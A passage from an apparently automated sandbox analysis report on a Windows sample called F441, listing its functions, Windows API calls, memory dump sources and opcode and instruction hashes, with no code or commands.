                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: CFF068321007147BD7203AF5988DB7B76E8AF55724F104539E746915C0DB78EC494A55
                                                                                Function 020F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5
                                                                                Function 00436D86 Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                                • Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
                                                                                • Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                                • Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8
                                                                                Function 0043724D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                                • Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
                                                                                • Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                                • Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A
                                                                                Function 00435440 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                                • Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
                                                                                • Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                                • Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6
                                                                                Function 004373E0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                                                • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                                                Function 004FF0FD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004FF14E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 004FE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_4fe000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 6f41d0cc6c19e623228ae3962396f0b535939b3bd55c148d5ab48ad6783b9761
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 78112079A00208FFDB01DF98CA85E99BBF5AF08750F0580A5F9489B361D375EA50DF44

                                                                                Non-executed Functions

                                                                                Function 0042EAB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                                • String ID: @$A$C$F
                                                                                • API String ID: 3829817484-319984173
                                                                                • Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                                • Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
                                                                                • Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                                • Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57
                                                                                Function 021072C9 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                                • API String ID: 0-4068174152
                                                                                • Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                                • Instruction ID: 4f28b425dee0eaebfec0217185637ff8e30ff15b97cf0671f566130dd3d76823
                                                                                • Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                                • Instruction Fuzzy Hash: 06C169B1640A018BD728CF14C4A1766F7B2FF56318F19865CC8A64BBD1E7B5F852CB90
                                                                                Function 00417062 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                                • API String ID: 0-4068174152
                                                                                • Opcode ID: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                                                • Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
                                                                                • Opcode Fuzzy Hash: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                                                • Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94
                                                                                Function 004223B8 Relevance: 9.3, Strings: 7, Instructions: 552COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                                                • API String ID: 1279760036-2560538612
                                                                                • Opcode ID: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                                                • Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
                                                                                • Opcode Fuzzy Hash: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                                                • Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46
                                                                                Function 020F9BC7 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$01$ZR\;$[hct${hmn
                                                                                • API String ID: 0-1484469362
                                                                                • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                                • Instruction ID: 1db013fc5542e8129d7bff52628b3c3bf51b59c604d0821c27acfc3959cd4664
                                                                                • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                                • Instruction Fuzzy Hash: 211201B02083818BE324CF58C4A4B6FBBE5BBD6348F144D1CE5A58B691D77AD409CB96
                                                                                Function 02113EFE Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02113FF4
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0211401D
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02114434
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02114462
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                                • Instruction ID: 506330352b7fd8f12d92625bd7f0a8fa6aa4daeb6b4a2221937f9d4f1c564011
                                                                                • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                                • Instruction Fuzzy Hash: BF3246B4500B009FD728CF29C495B17BBB2FB85314F158A5CE8A64BB99D774E80ACBD1
                                                                                Function 00423C97 Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                                                • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                                                • Opcode Fuzzy Hash: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                                                • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                                                Function 02113ECF Relevance: 6.6, APIs: 4, Instructions: 614COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02113FF4
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0211401D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                                • Instruction ID: c1bb1dd623f42f681558518d42916328ff1f816934ac42641faec7145525575e
                                                                                • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                                • Instruction Fuzzy Hash: D63255B4500B009FD728CF29C494B17BBB2FB85314F158A5CD8A64BB89D774E80ACBD1
                                                                                Function 00421C71 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: /V.W$2 B$J>;0$gdeb
                                                                                • API String ID: 1279760036-1943473526
                                                                                • Opcode ID: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                                                • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                                                • Opcode Fuzzy Hash: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                                                • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                                                Function 02111C89 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #M*O$.A+C$<Y9[$de
                                                                                • API String ID: 0-619215113
                                                                                • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                                • Instruction ID: 3caef78d64f9d476fef592a9e74382b52fb0a804ed11544417f038c6a4da6b67
                                                                                • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                                • Instruction Fuzzy Hash: 3E4168716483958BC728CF04C0A07ABF7F1FF86314F915A2CE9DA5B690D7B59805CB86
                                                                                Function 021175BA Relevance: 4.9, Strings: 3, Instructions: 1198COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2PBb$Yceh$]hW9
                                                                                • API String ID: 0-1551782443
                                                                                • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                                • Instruction ID: 5ecda6a6761544bce744c52e4b0bb42ee94616903516ad486974ed066a99cfd8
                                                                                • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                                • Instruction Fuzzy Hash: AD924D70145B808EE726CF35C4A47E7BBE1BF16309F48496CD1EB8B282DB79610ACB51
                                                                                Function 02115F55 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$7452$JlRp
                                                                                • API String ID: 0-3284767125
                                                                                • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                                • Instruction ID: 964ec7beb679601015f02ae520212a211be6a72cca04fa4b36934bca63b58b3a
                                                                                • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                                • Instruction Fuzzy Hash: 5952AF70245B808FE335CF29C4A07A6BBE6BF56304F54896DC4EB8BA85C776B009CB55
                                                                                Function 00425CEE Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: 7452$7452$JlRp
                                                                                • API String ID: 2994545307-3284767125
                                                                                • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                                • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                                                • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                                • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                                                Function 0212B2B7 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"$R-,T$R-,T
                                                                                • API String ID: 0-1082949730
                                                                                • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                                • Instruction ID: dfccbb639e10e88d7ad2eaa155d39b7af149dbb04c76dab202cdde4c3e0afe15
                                                                                • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                                • Instruction Fuzzy Hash: 66B19D71A083618BC728CF18C490B6BB7E2FF88758F19861CF8995B361D735D925CB91
                                                                                Function 0043B050 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"$R-,T$R-,T
                                                                                • API String ID: 0-1082949730
                                                                                • Opcode ID: 097c3629edcab9a4efba3e8f93c32dca5dad52f6725115fe54fdaabd073b34a7
                                                                                • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                                                • Opcode Fuzzy Hash: 097c3629edcab9a4efba3e8f93c32dca5dad52f6725115fe54fdaabd073b34a7
                                                                                • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                                                Function 020F56A7 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$8
                                                                                • API String ID: 0-46163386
                                                                                • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                                • Instruction ID: 99c95b9e47ff17ab21f50e82a8aa1a1c375c5330050ef0e0607b2c8aa2d885cd
                                                                                • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                                • Instruction Fuzzy Hash: C18267716083409FD7A1CF28C88079ABBE1BF88318F48892DFA9987791D375D954DF92
                                                                                Function 00405440 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$8
                                                                                • API String ID: 0-46163386
                                                                                • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                                • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                                                • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                                • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                                                Function 00424B80 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$"
                                                                                • API String ID: 0-3758156766
                                                                                • Opcode ID: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                                                • Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
                                                                                • Opcode Fuzzy Hash: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                                                • Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86
                                                                                Function 021163DB Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction ID: c43dc9cabe2de9706df4e17496983e4702b3a8a14ae83c8f5824931186adfc6c
                                                                                • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction Fuzzy Hash: 92F170B0644B808FE339CF25C0A47A3BBE5BF56304F44896DC4EB8B685D77AA009CB51
                                                                                Function 00426174 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
